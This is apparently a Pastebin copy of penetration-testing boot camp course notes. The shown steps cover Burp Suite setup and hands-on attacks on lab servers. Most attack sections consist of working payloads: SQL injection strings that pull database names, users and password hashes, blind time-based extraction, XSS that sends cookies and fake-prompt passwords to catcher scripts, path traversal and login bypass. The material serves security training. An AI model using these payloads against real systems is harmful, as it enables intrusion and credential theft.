Advertisement
moemyintshein

BurpSuite Boot Camp

Mar 6th, 2017
120
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. ####################
  2. # Course Materials #
  3. ####################
  4.  
  5. Slides:
  6. https://s3.amazonaws.com/StrategicSec-Files/BurpSuiteBootcamp/WebAppSecIsNotEasyButCanBeSimple.pptx
  7. https://s3.amazonaws.com/StrategicSec-Files/BurpSuiteBootcamp/Burp+Suite.pptx
  8.  
  9.  
  10. Lab Manual:
  11. https://s3.amazonaws.com/StrategicSec-Files/BurpSuiteBootcamp/BurpSuite-Bootcamp-v1.pdf
  12.  
  13.  
  14.  
  15. Day 1 Homework:
  16. Here is a good reference of how to use Burp to look for OWASP Top 10 vulnerabilities:
  17. https://support.portswigger.net/customer/portal/articles/1969845-using-burp-to-test-for-the-owasp-top-ten
  18.  
  19.  
  20. Use Burp Suite to demonstrate with screenshots and explanations of how to test for the all of the OWASP Top 10 vulnerabilities against your choice of targets the following targets:
  21. http://54.213.252.28/
  22. http://54.172.112.249/
  23.  
  24. Submit the results via email in an MS Word document with (naming convention example: YourFirstName-YourLastName-Burp-Suite-Bootcamp-Day1-Homework.docx)
  25.  
  26. Day 1 Challenge:
  27. Use Burp Suite to demonstrate with screenshots and explanations of how to test for the all of the OWASP Top 10 vulnerabilities against your choice of targets the following targets:
  28. http://strategicsec.com
  29. http://54.213.131.105/
  30.  
  31. Submit the results via email in an MS Word document with (naming convention example: YourFirstName-YourLastName-Burp-Suite-Bootcamp-Day1-Challenge.docx)
  32.  
  33.  
  34. Day 2 Homework:
  35. Here are some sample web app penetration test reports from other companies that you can look at:
  36. https://s3.amazonaws.com/StrategicSec-Files/WebAppSampleReports.zip
  37.  
  38. I want you to perform a penetration test against http://zero.webappsecurity.com and document the engagement as if it were a real project.
  39.  
  40.  
  41. Day 2 Challenge:
  42. ----------------------------------
  43. Use the StrategicSec Ubuntu VM to demonstrate how to install, configure, and use at least five (5) of the following Burp Suite extensions from these websites and lists below:
  44. https://github.com/integrissecurity/carbonator
  45. https://github.com/allfro/BurpKit
  46. https://github.com/nccgroup/BurpSuiteLoggerPlusPlus
  47. https://github.com/Quitten/Autorize
  48. https://github.com/codewatchorg/sqlipy
  49. https://github.com/augustd/burp-suite-token-fetcher
  50. https://github.com/augustd/burp-suite-gwt-scan
  51.  
  52. https://webbreacher.wordpress.com/2015/07/25/my-favorite-burp-suite-extensions/
  53. http://bughunting.guide/the-top-5-burp-suite-extensions/
  54. https://www.codemagi.com/downloads/
  55.  
  56.  
  57.  
  58. You must use them against your choice of targets the following targets:
  59. http://strategicsec.com
  60. http://54.213.252.28/
  61. http://54.172.112.249/
  62. http://54.200.178.220/
  63. http://54.213.131.105/
  64.  
  65. Submit the results via email in an MS Word document with (naming convention example: YourFirstName-YourLastName-Burp-Suite-Bootcamp-Day2-Challenge.docx)
  66.  
  67.  
  68.  
  69. ##########
  70. # VMWare #
  71. ##########
  72. - For this workshop you'll need the latest version of VMWare Workstation (Windows), Fusion (Mac), or Player.
  73.  
  74. - A 30-day trial of Workstation 11 can be downloaded from here:
  75. - https://my.vmware.com/web/vmware/info/slug/desktop_end_user_computing/vmware_workstation/11_0
  76.  
  77. - A 30-day trial of Fusion 7 can be downloaded from here:
  78. - https://my.vmware.com/web/vmware/info/slug/desktop_end_user_computing/vmware_fusion/7_0
  79.  
  80. - The newest version of VMWare Player can be downloaded from here:
  81. - https://my.vmware.com/web/vmware/free#desktop_end_user_computing/vmware_player/7_0
  82.  
  83.  
  84. - Although you can get the VM to run in VirtualBox, I will not be supporting this configuration for this class.
  85.  
  86.  
  87. ##########################
  88. # Download the attack VM #
  89. ##########################
  90. https://s3.amazonaws.com/StrategicSec-VMs/StrategicsecUbuntu-v3.zip
  91. user: strategicsec
  92. pass: strategicsec
  93.  
  94.  
  95. ##################################
  96. # Basic: Web Application Testing #
  97. ##################################
  98.  
  99. Most people are going to tell you reference the OWASP Testing guide.
  100. https://www.owasp.org/index.php/OWASP_Testing_Guide_v4_Table_of_Contents
  101.  
  102. I'm not a fan of it for the purpose of actual testing. It's good for defining the scope of an assessment, and defining attacks, but not very good for actually attacking a website.
  103.  
  104.  
  105. The key to doing a Web App Assessment is to ask yourself the 3 web questions on every page in the site.
  106.  
  107. 1. Does the website talk to a DB?
  108. - Look for parameter passing (ex: site.com/page.php?id=4)
  109. - If yes - try SQL Injection
  110.  
  111. 2. Can I or someone else see what I type?
  112. - If yes - try XSS
  113.  
  114. 3. Does the page reference a file?
  115. - If yes - try LFI/RFI
  116.  
  117. Let's start with some manual testing against 54.213.100.93
  118.  
  119.  
  120. Start here:
  121. http://54.213.252.28/
  122.  
  123.  
  124. There's no parameter passing on the home page so the answer to question 1 is NO.
  125. There is however a search box in the top right of the webpage, so the answer to question 2 is YES.
  126.  
  127. Try an XSS in the search box on the home page:
  128. <script>alert(123);</script>
  129.  
  130. Doing this gives us the following in the address bar:
  131. http://54.213.252.28/BasicSearch.aspx?Word=<script>alert(123);</script>
  132.  
  133. Ok, so we've verified that there is XSS in the search box.
  134.  
  135. Let's move on to the search box in the left of the page.
  136.  
  137. Let's give the newsletter signup box a shot
  138.  
  139. Moving on to the login page.
  140. http://54.213.252.28/login.aspx
  141.  
  142. I entered a single quote (') for both the user name and the password. I got the following error:
  143.  
  144. -----------------------------------------------------------------
  145. 'Users//User[@Name=''' and @Password=''']' has an invalid token.
  146. Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.
  147.  
  148. Exception Details: System.Xml.XPath.XPathException: 'Users//User[@Name=''' and @Password=''']' has an invalid token.
  149.  
  150. Source Error:
  151.  
  152.  
  153. Line 112: doc.Load(Server.MapPath("") + @"\AuthInfo.xml");
  154. Line 113: string credential = "Users//User[@Name='" + UserName + "' and @Password='" + Password + "']";
  155. Line 114: XmlNodeList xmln = doc.SelectNodes(credential);
  156. Line 115: //String test = xmln.ToString();
  157. Line 116: if (xmln.Count > 0)
  158.  
  159. -----------------------------------------------------------------
  160.  
  161.  
  162. Hmm....System.Xml.XPath.XPathException.....that's not SQL.
  163.  
  164. WTF is this:
  165. Line 112: doc.Load(Server.MapPath("") + @"\AuthInfo.xml");
  166.  
  167.  
  168.  
  169.  
  170. In this case you'll have the trap the request with a proxy like:
  171. - Firefox Tamper Data
  172. - Burp Suite http://www.portswigger.net/Burp/proxy.html
  173. - WebScarab https://www.owasp.org/index.php/Category:OWASP_WebScarab_Project
  174. - Rat Proxy https://code.google.com/p/ratproxy/
  175. - Zap Proxy https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project
  176. - Paros http://sourceforge.net/projects/paros/
  177.  
  178.  
  179.  
  180. Let's go back to that page error message.....
  181.  
  182.  
  183. Let's check it out:
  184. http://54.213.252.28/AuthInfo.xml
  185.  
  186. Looks like we found passwords!!!!!!!!!!
  187.  
  188.  
  189. Looks like there no significant new functionality after logging in with the stolen credentials.
  190.  
  191. Going back to the homepage...let's see if we can see anything. Figured I'd click on one of the links
  192.  
  193.  
  194. http://54.213.252.28/bookdetail.aspx?id=2
  195.  
  196.  
  197. Ok, there is parameter passing (bookdetail.aspx?id=2).
  198.  
  199. The page name is: bookdetail.aspx
  200. The parameter name is: id
  201. The paramber value is: 2
  202.  
  203.  
  204. Let's try throwing a single quote (') in there:
  205.  
  206. http://54.213.252.28/bookdetail.aspx?id=2'
  207.  
  208.  
  209. I get the following error:
  210.  
  211. Unclosed quotation mark after the character string ''.
  212. Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.
  213.  
  214. Exception Details: System.Data.SqlClient.SqlException: Unclosed quotation mark after the character string ''.
  215.  
  216.  
  217.  
  218.  
  219.  
  220.  
  221.  
  222.  
  223.  
  224.  
  225. #############################################################################
  226. # SQL Injection #
  227. # https://s3.amazonaws.com/StrategicSec-Files/1-Intro_To_SQL_Intection.pptx #
  228. #############################################################################
  229.  
  230.  
  231. - Another quick way to test for SQLI is to remove the paramter value
  232.  
  233.  
  234. #############################
  235. # Error-Based SQL Injection #
  236. #############################
  237. http://54.213.252.28/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(0))--
  238. http://54.213.252.28/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(1))--
  239. http://54.213.252.28/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(2))--
  240. http://54.213.252.28/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(3))--
  241. http://54.213.252.28/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(4))--
  242. http://54.213.252.28/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(N))-- NOTE: "N" - just means to keep going until you run out of databases
  243. http://54.213.252.28/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85))--
  244. http://54.213.252.28/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'bookmaster')--
  245. http://54.213.252.28/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'sysdiagrams')--
  246.  
  247.  
  248.  
  249.  
  250. #############################
  251. # Union-Based SQL Injection #
  252. #############################
  253. http://54.213.252.28/bookdetail.aspx?id=2 order by 100--
  254. http://54.213.252.28/bookdetail.aspx?id=2 order by 50--
  255. http://54.213.252.28/bookdetail.aspx?id=2 order by 25--
  256. http://54.213.252.28/bookdetail.aspx?id=2 order by 10--
  257. http://54.213.252.28/bookdetail.aspx?id=2 order by 5--
  258. http://54.213.252.28/bookdetail.aspx?id=2 order by 6--
  259. http://54.213.252.28/bookdetail.aspx?id=2 order by 7--
  260. http://54.213.252.28/bookdetail.aspx?id=2 order by 8--
  261. http://54.213.252.28/bookdetail.aspx?id=2 order by 9--
  262. http://54.213.252.28/bookdetail.aspx?id=2 union all select 1,2,3,4,5,6,7,8,9--
  263.  
  264. We are using a union select statement because we are joining the developer's query with one of our own.
  265. Reference:
  266. http://www.techonthenet.com/sql/union.php
  267. The SQL UNION operator is used to combine the result sets of 2 or more SELECT statements.
  268. It removes duplicate rows between the various SELECT statements.
  269.  
  270. Each SELECT statement within the UNION must have the same number of fields in the result sets with similar data types.
  271.  
  272. http://54.213.252.28/bookdetail.aspx?id=-2 union all select 1,2,3,4,5,6,7,8,9--
  273.  
  274. Negating the paramter value (changing the id=2 to id=-2) will force the pages that will echo back data to be displayed.
  275.  
  276. http://54.213.252.28/bookdetail.aspx?id=-2 union all select 1,user,@@version,4,5,6,7,8,9--
  277. http://54.213.252.28/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,7,8,9--
  278. http://54.213.252.28/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,db_name(0),8,9--
  279. http://54.213.252.28/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,master.sys.fn_varbintohexstr(password_hash),8,9 from master.sys.sql_logins--
  280.  
  281.  
  282.  
  283.  
  284.  
  285. - Another way is to see if you can get the backend to perform an arithmetic function
  286. http://54.213.252.28/bookdetail.aspx?id=(2)
  287. http://54.213.252.28/bookdetail.aspx?id=(4-2)
  288. http://54.213.252.28/bookdetail.aspx?id=(4-1)
  289.  
  290.  
  291.  
  292. http://54.213.252.28/bookdetail.aspx?id=2 or 1=1--
  293. http://54.213.252.28/bookdetail.aspx?id=2 or 1=2--
  294. http://54.213.252.28/bookdetail.aspx?id=1*1
  295. http://54.213.252.28/bookdetail.aspx?id=2 or 1 >-1#
  296. http://54.213.252.28/bookdetail.aspx?id=2 or 1<99#
  297. http://54.213.252.28/bookdetail.aspx?id=2 or 1<>1#
  298. http://54.213.252.28/bookdetail.aspx?id=2 or 2 != 3--
  299. http://54.213.252.28/bookdetail.aspx?id=2 &0#
  300.  
  301.  
  302.  
  303.  
  304.  
  305. ###############################
  306. # Blind SQL Injection Testing #
  307. ###############################
  308. Time-Based BLIND SQL INJECTION - EXTRACT DATABASE USER
  309.  
  310. 3 - Total Characters
  311. http://54.213.252.28/bookdetail.aspx?id=2; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'--
  312. http://54.213.252.28/bookdetail.aspx?id=2; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'--
  313. http://54.213.252.28/bookdetail.aspx?id=2; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'-- (Ok, the username is 3 chars long - it waited 10 seconds)
  314.  
  315. Let's go for a quick check to see if it's DBO
  316. http://54.213.252.28/bookdetail.aspx?id=2; IF ((USER)='dbo') WAITFOR DELAY '00:00:10'--
  317.  
  318. Yup, it waited 10 seconds so we know the username is 'dbo' - let's give you the syntax to verify it just for fun.
  319.  
  320. D - 1st Character
  321. http://54.213.252.28/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=97) WAITFOR DELAY '00:00:10'--
  322. http://54.213.252.28/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=98) WAITFOR DELAY '00:00:10'--
  323. http://54.213.252.28/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=99) WAITFOR DELAY '00:00:10'--
  324. http://54.213.252.28/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=100) WAITFOR DELAY '00:00:10'-- (Ok, first letter is a 100 which is the letter 'd' - it waited 10 seconds)
  325.  
  326. B - 2nd Character
  327. http://54.213.252.28/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))>97) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
  328. http://54.213.252.28/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))=98) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
  329.  
  330. O - 3rd Character
  331. http://54.213.252.28/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>97) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
  332. http://54.213.252.28/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>115) WAITFOR DELAY '00:00:10'--
  333. http://54.213.252.28/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>105) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
  334. http://54.213.252.28/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>110) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
  335. http://54.213.252.28/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=109) WAITFOR DELAY '00:00:10'--
  336. http://54.213.252.28/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=110) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
  337.  
  338.  
  339.  
  340.  
  341.  
  342.  
  343.  
  344.  
  345.  
  346.  
  347. ###################################################################
  348. # What is XSS #
  349. # https://s3.amazonaws.com/StrategicSec-Files/2-Intro_To_XSS.pptx #
  350. ###################################################################
  351.  
  352. OK - what is Cross Site Scripting (XSS)
  353.  
  354. 1. Use Firefox to browse to the following location:
  355.  
  356. http://54.172.112.249/xss_practice/
  357.  
  358. A really simple search page that is vulnerable should come up.
  359.  
  360.  
  361.  
  362.  
  363. 2. In the search box type:
  364.  
  365. <script>alert('So this is XSS')</script>
  366.  
  367.  
  368. This should pop-up an alert window with your message in it proving XSS is in fact possible.
  369. Ok, click OK and then click back and go back to http://54.172.112.249/xss_practice/
  370.  
  371.  
  372. 3. In the search box type:
  373.  
  374. <script>alert(document.cookie)</script>
  375.  
  376.  
  377. This should pop-up an alert window with your message in it proving XSS is in fact possible and your cookie can be accessed.
  378. Ok, click OK and then click back and go back to http://54.172.112.249/xss_practice/
  379.  
  380. 4. Now replace that alert script with:
  381.  
  382. <script>document.location="http://54.172.112.249/xss_practice/cookie_catcher.php?c="+document.cookie</script>
  383.  
  384.  
  385. This will actually pass your cookie to the cookie catcher that we have sitting on the webserver.
  386.  
  387.  
  388. 5. Now view the stolen cookie at:
  389. http://54.172.112.249/xss_practice/cookie_stealer_logs.html
  390.  
  391.  
  392. The cookie catcher writes to this file and all we have to do is make sure that it has permissions to be written to.
  393.  
  394.  
  395.  
  396.  
  397.  
  398.  
  399. ############################
  400. # A Better Way To Demo XSS #
  401. ############################
  402.  
  403.  
  404. Let's take this to the next level. We can modify this attack to include some username/password collection. Paste all of this into the search box.
  405.  
  406.  
  407. Use Firefox to browse to the following location:
  408.  
  409. http://54.172.112.249/xss_practice/
  410.  
  411.  
  412.  
  413. Paste this in the search box
  414. ----------------------------
  415.  
  416.  
  417. Option 1
  418. --------
  419.  
  420. <script>
  421. password=prompt('Your session is expired. Please enter your password to continue',' ');
  422. document.write("<img src=\"http://54.172.112.249/xss_practice/passwordgrabber.php?password=" +password+"\">");
  423. </script>
  424.  
  425.  
  426. Now view the stolen cookie at:
  427. http://54.172.112.249/xss_practice/passwords.html
  428.  
  429.  
  430.  
  431. Option 2
  432. --------
  433. <script>
  434. username=prompt('Please enter your username',' ');
  435. password=prompt('Please enter your password',' ');
  436. document.write("<img src=\"http://54.172.112.249/xss_practice/unpw_catcher.php?username="+username+"&password="+password+"\">");
  437. </script>
  438.  
  439.  
  440.  
  441.  
  442. Now view the stolen cookie at:
  443. http://54.172.112.249/xss_practice/username_password_logs.html
  444.  
  445.  
  446.  
  447.  
  448. #########################################
  449. # Let's kick it up a notch with ASP.NET #
  450. # http://54.200.178.220/ #
  451. #########################################
  452.  
  453.  
  454. The trading Web App is on http://54.200.178.220/
  455.  
  456.  
  457. Try the following in the search box:
  458. <script>alert(123);</script>
  459. ' or 1=1
  460. ' and a=a
  461. 1=1
  462. Joe'+OR+1=1;--
  463.  
  464.  
  465. <script>alert(123);</script>
  466.  
  467. Open a new tab in firefox and try this:
  468. http://54.200.178.220/Searchresult.aspx?<script>alert(123);</script>=ScriptName
  469.  
  470.  
  471. Try the contact us form.
  472. Open a new tab in firefox and try this:
  473. http://54.200.178.220/OpenPage.aspx?filename=../../../../../../windows/win.ini
  474.  
  475. Try this on the inquiry form:
  476. Joe McCray
  477. 1234567890
  478. joe@strategicsec.com') waitfor delay '00:00:10'--
  479.  
  480.  
  481. Login Box:
  482.  
  483. ' or 1=1 or ''='
  484. anything (click login instead of pressing enter)
  485.  
  486.  
  487.  
  488. Tamper Data: (notice 2 session IDs)
  489.  
  490. AcmeTrading=a4b796687b846dd4a34931d708c62b49; SessionID is md5
  491. IsAdmin=yes;
  492. ASP.NET_SessionId=d10dlsvaq5uj1g550sotcg45
  493.  
  494.  
  495.  
  496. Profile - Detail (tamper data)
  497. Disposition: form-data; name="ctl00$contentMiddle$HiddenField1"\r\n\r\njoe\r\n
  498. joe|set
  499.  
  500.  
  501. xss_upload.txt (Upload Bulk Order)
  502. <script>alert(123);</script>
  503.  
  504.  
  505.  
  506.  
  507. ############################
  508. # Trading Web App with WAF #
  509. # http://54.213.131.105 #
  510. ############################
  511.  
  512.  
  513. Try the following in the search box:
  514. <script>alert(123);</script>
  515. <script>alert(123);</script
  516. <script>alert(123)
  517. <script>alert
  518. <script>
  519. <script
  520. <scrip
  521. <scri
  522. <scr
  523. <sc
  524. <s
  525. <p
  526. <
  527. < s
  528. Joe'+OR+1=1;--
  529.  
  530.  
  531. Open a new tab in firefox and try this:
  532. http://54.213.131.105/Searchresult.aspx?%u003cscript>prompt(123)%u003c/script>=ScriptName
  533.  
  534.  
  535. xss_upload.txt (Upload Bulk Order)
  536. <script>alert(123);</script>
  537.  
  538.  
  539. Login Box:
  540.  
  541. ' or 1=1 or ''='
  542. anything
  543.  
  544.  
  545. #########################
  546. # Setting up Burp Suite #
  547. #########################
  548. Download latest free version of Burp at http://www.portswigger.net/burp/download.html
  549. Make sure that burpsuite_free_v1.6.31.jar is set as executable (chmod +x burpsuite_free_v1.6.31.jar) and then run:
  550.  
  551. java -jar burpsuite_free_v1.6.31.jar
  552.  
  553. - Click the "Proxy" tab
  554. - Click the "Options" sub tab
  555. - Click “Edit” in the “Proxy Listeners” section
  556. - In the “Edit proxy listener” pop up select “Binding Tab” select “loopback only”
  557. - In the same pop up make sure that the bind port is 8080
  558. - In the same pop up select the “Certificate” tab
  559. - Ensure that burp is configured to "generate CA-signed per-host certificates"
  560.  
  561. Open Firefox
  562. - Click "Edit"
  563. - Click “Preferences"
  564. - Click the "Advanced" tab
  565. - Click the "Network" sub tab
  566. - Click the connection "settings" button
  567. - Click "manual proxy configuration"
  568. set it to 127.0.0.1 port 8080
  569. check "Use this proxy server for all protocols"
  570. - Remove both the "localhost, 127.0.0.1" text from the "No Proxy For:" line
  571.  
  572.  
  573. Configure your browser to use Burp as its proxy, and configure Burp's proxy listener to generate CA-signed per-host certificates.
  574.  
  575. Visit any SSL-protected URL.
  576.  
  577. On the “This Connection is Untrusted” screen, click on “Add Exception”
  578. Click "Get Certificate", then click "View".
  579.  
  580. In the “Details” tab, select the root certificate in the tree (PortSwigger CA).
  581.  
  582. Click "Export" and save the certificate as "BurpCert" on the Desktop.
  583.  
  584. Close Certificate Viewer dialog and click “Cancel” on the “Add Security Exception” dialog
  585. Go to Edit | Preferences
  586. Click “Advanced” and go to “Certificates” tab
  587. Click “View Certificates”
  588.  
  589. Click "Import" and select the certificate file that you previously saved.
  590.  
  591. On the "Downloading Certificate" dialog, check the box "Trust this CA to identify web sites", and click "OK".
  592.  
  593. Close all dialogs and restart Firefox
  594.  
  595.  
  596.  
  597. ################
  598. # Web Servcies #
  599. ################
  600. http://data.serviceplatform.org/wsdl_grabbing/seekda-wsdls.with_ini/36-CurrencyConvertor.wsdl
  601.  
  602. ###############################################################
  603. # Question 1: What is the process that you use when you test? #
  604. ###############################################################
  605.  
  606. Step 1: Automated Testing
  607.  
  608. Step 1a: Web Application vulnerability scanners
  609. -----------------------------------------------
  610. - Run two (2) unauthenticated vulnerability scans against the target
  611. - Run two (2) authenticated vulnerability scans against the target with low-level user credentials
  612. - Run two (2) authenticated vulnerability scans against the target with admin privileges
  613.  
  614. The web application vulnerability scanners that I use for this process are (HP Web Inspect, and Acunetix).
  615.  
  616. A good web application vulnerability scanner comparison website is here:
  617. http://sectoolmarket.com/price-and-feature-comparison-of-web-application-scanners-unified-list.html
  618.  
  619.  
  620. Look to see if there are cases where both scanners identify the same vulnerability. Investigate these cases thoroughly, ensure that it is NOT a false positive, and report the issue.
  621.  
  622. When you run into cases where one (1) scanner identifies a vulnerability that the other scanner does not you should still investigate these cases thoroughly, ensure that it is NOT a false positive, and report the issue.
  623.  
  624.  
  625. Be sure to look for scans that take more than 3 or 4 hours as your scanner may have lost its active session and is probably not actually finding real vulnerabilities anymore.
  626.  
  627.  
  628. Also, be sure to save the scan results and logs. I usually provide this data to the customer.
  629.  
  630.  
  631.  
  632. Step 1b: Directory Brute Forcer
  633. -------------------------------
  634. I like to run DirBuster or a similar tool. This is great to find hidden gems (backups of the website, information leakage, unreferenced files, dev sites, etc).
  635.  
  636.  
  637.  
  638. Step 2: Manual Testing
  639.  
  640. Try to do this step while your automated scans are running. Use Burp Suite or the Tamper Data Firefox extension to browse EVERY PAGE of the website (if this is realistic).
  641.  
  642. Step 2a: Spider/Scan the entire site with Burp Suite
  643. Save the spider and scan results. I usually provide this data to the customer as well.
  644.  
  645.  
  646. Step 2b: Browse through the site using the 3 question method
  647. Have Burp Suite on with intercept turned off. Browse the website using the 3 question method that I've taught you in the past. When you find a place in the site where the answer to one of the 3 questions is yes - be sure to look at that individual web request in the target section of Burp Suite, right-click on that particular request and choose 'Send to Intruder'.
  648.  
  649. Take the appropriate fuzz list from https://github.com/fuzzdb-project/fuzzdb/ and load it into Intruder. A quick tip for each individual payload is to be sure to send the payload both with and without the parameter value.
  650.  
  651. Here is what I mean:
  652. http://www.site.com/page.aspx?parametername=parametervalue
  653.  
  654. When you are looking at an individual request - often times Burp Suite will insert the payload in place of the parameter value like this:
  655.  
  656. http://www.site.com/page.aspx?parametername=[ payload ]
  657.  
  658. You need to ensure that you send the payload this way, and like this below:
  659.  
  660. http://www.site.com/page.aspx?parametername=parametervalue[ payload ]
  661.  
  662. This little hint will pay huge dividends in actually EXPLOITING the vulnerabilities you find instead of just identifying them.
  663.  
  664.  
  665.  
  666.  
  667.  
  668.  
  669.  
  670. ###########################################
  671. # Question 2: How much fuzzing is enough? #
  672. ###########################################
  673. There really is no exact science for determining the correct amount of fuzzing per parameter to do before moving on to something else.
  674.  
  675. Here are the steps that I follow when I'm testing (my mental decision tree) to figure out how much fuzzing to do.
  676.  
  677.  
  678. Step 1: Ask yourself the 3 questions per page of the site.
  679.  
  680. Step 2: If the answer is yes, then go down that particular attack path with a few fuzz strings (I usually do 10-20 fuzz strings per parameter)
  681.  
  682. Step 3: When you load your fuzz strings - use the following decision tree
  683.  
  684. - Are the fuzz strings causing a default error message (example 404)?
  685. - If this is the case then it is most likely NOT vulnerable
  686.  
  687. - Are the fuzz strings causing a WAF or LB custom error message?
  688. - If this is the case then you need to find an encoding method to bypass
  689.  
  690.  
  691. - Are the fuzz strings causing an error message that discloses the backend type?
  692. - If yes, then identify DB type and find correct syntax to successfully exploit
  693. - Some example strings that I use are:
  694. '
  695. "
  696. () <----- Take the parameter value and put it in parenthesis
  697. (5-1) <----- See if you can perform an arithmetic function
  698.  
  699.  
  700. - Are the fuzz strings rendering executable code?
  701. - If yes, then report XSS/CSRF/Response Splitting/Request Smuggling/etc
  702. - Some example strings that I use are:
  703. <b>hello</b>
  704. <u>hello</u>
  705. <script>alert(123);</script>
  706. <script>alert(xss);</script>
  707. <script>alert('xss');</script>
  708. <script>alert("xss");</script>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement